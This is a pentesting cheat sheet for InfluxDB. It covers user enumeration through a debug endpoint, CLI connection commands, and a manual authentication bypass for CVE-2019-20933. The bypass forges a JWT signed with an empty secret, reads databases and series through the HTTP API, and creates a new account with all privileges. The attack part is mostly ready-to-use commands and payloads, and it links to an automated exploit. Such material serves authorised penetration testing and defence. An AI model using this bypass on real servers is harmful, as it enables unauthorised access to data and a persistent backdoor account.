# InfluxDB Pentesting

#### InfluxDB is a time series database written in Go. A default port is 8086.

### Enumeration <a href="#enumeration" id="enumeration"></a>

```shellscript
# User enumeration
curl http://<target-ip>:8086/debug/requests
```

### Connect <a href="#connect" id="connect"></a>

```shellscript
influx -host 10.0.0.1 -port 8086
influx -host 10.0.0.1 -port 8086 -database <database>
influx -host 10.0.0.1 -port 8086 -username <username>  -password <password>

# Import db file
influx -path example.db
```

### Authentication Bypass (CVE-2019-20933) version ≤ 1.7.6 <a href="#authentication-bypass-cve-2019-20933-version-176" id="authentication-bypass-cve-2019-20933-version-176"></a>

#### Automation <a href="#automation" id="automation"></a>

<https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933>

#### Manual <a href="#manual" id="manual"></a>

Reference: <https://www.komodosec.com/post/when-all-else-fails-find-a-0-day>

Firse find the username.

```
curl http://<target-ip>:8086/debug/requests
```

Then create a JWT using the name we found in [jwt.io](https://jwt.io/).\
Parameters are below:

```shellscript
Header:

{ “sub”: “123456789”, "alg": "HS256", "typ": "JWT" }

Payload:

{ "username": "**<username>**",  "exp":21548669066 }

Verify Signature:

HMACSHA256(base64UrlEncode(header) + "." +base64UrlEncode(payload),<e**mpty>**)
```

Copy the generated JWT.\
Now we can query the InfluxDB API.

```shellscript
INFLUXDB_JWT="<JWT>"
# List databases
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode 'q=SHOW DATABASES' | jq
# List seriest in the database
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode 'db=<database>' --data-urlencode 'q=SHOW SERIES' | jq
# Get values in the series
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode 'db=<database>' --data-urlencode 'q=SELECT * FROM <series>' | jq

# Create a privileged account
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode "q=CREATE USER tester with PASSWORD 'password' with ALL PRIVILEGES"
```

### Commands <a href="#commands" id="commands"></a>

```shellscript
# Show command history
> history
# Show settings
> settings

# List databases
> show databases
# Show series information
> show series
# Show measurement information
> show measurements
# Show tag key information
> show tag keys
# Show field key information
> show field keys

# Switch to the database
> use <database>
# Query in the database
> select * from <series>
```

### References <a href="#references" id="references"></a>

* [LorenzoTullini](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933)